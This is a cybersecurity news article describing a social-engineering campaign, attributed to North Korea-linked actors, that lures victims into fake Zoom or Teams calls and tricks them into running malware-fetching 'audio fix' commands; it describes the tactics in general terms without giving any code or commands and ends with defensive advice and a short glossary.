Behind the Screen: How Hackers Turn Fake Video Calls into Cyber Heists

It starts like any ordinary workday - a Slack message from a colleague, a LinkedIn DM from a recruiter, or a Telegram ping from a fellow developer. Then comes the invitation: “Let’s hop on a Zoom call to discuss.” But behind the pixel-perfect meeting interface, a new breed of cybercriminal is waiting, ready to turn your routine catch-up into a digital ambush.

A New Breed of Social Engineering

This campaign, tracked by the Security Alliance (SEAL), marks a chilling evolution in cybercrime tactics. Rather than relying on crude phishing emails, the group - believed to have ties to North Korean threat actors - spends weeks building trust. They infiltrate professional circles, sometimes taking over legitimate Telegram, LinkedIn, or Slack accounts, and continue real conversations with their targets. When that’s not possible, they fabricate entire workspaces or personas to simulate credibility.

The trap is set with a meeting invite, scheduled days in advance to lower suspicion. At the appointed time, the victim receives what appears to be a standard Zoom or Microsoft Teams link. But the link leads to a lookalike page, expertly mimicking the real thing using legitimate software development kits (SDKs). In some cases, the interface even displays familiar faces - video clips scraped from public events - to further lull the victim into a false sense of security.

Malware by “Technical Support”

When “audio issues” inevitably arise, the platform prompts the user to fix the problem - often by downloading a script or pasting a command into their terminal. The code looks benign, but it contacts attacker-controlled servers to fetch the actual malware. Because there’s no obvious executable, security software may not flag it, and the victim believes they’re just troubleshooting.

Once executed, the malware is a Swiss Army knife for cybercrime. It can steal browser credentials, crypto wallet secrets, session tokens, and password manager data. It can log keystrokes, swap browser extensions, and extract sensitive files and SSH keys. The attackers often wait before exploiting their new access, letting victims think the “call” simply failed - while quietly expanding their reach to contacts and networks.

Wider Implications

Recent links to a supply chain attack targeting the npm package “axios” suggest these groups are eyeing larger prey: software maintainers and open-source projects. Their patience and technical sophistication make them a formidable threat, especially as they weaponize familiar collaboration tools.

Experts urge vigilance: double-check meeting links, never run scripts or commands from untrusted sources, and use robust endpoint protection. In a world where even a video call can be weaponized, trust - but verify - has never been more important.

WIKICROOK

• Phishing: Phishing is a cybercrime where attackers send fake messages to trick users into revealing sensitive data or clicking malicious links.
• Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.
• AppleScript: AppleScript is a macOS scripting language for automating tasks, but it can also be misused by malware to run hidden or unauthorized commands.
• Session Token: A session token is a unique digital code that keeps users logged in to websites or apps. If stolen, attackers can access accounts without a password.
• Supply Chain Attack: A supply chain attack is a cyberattack that compromises trusted software or hardware providers, spreading malware or vulnerabilities to many organizations at once.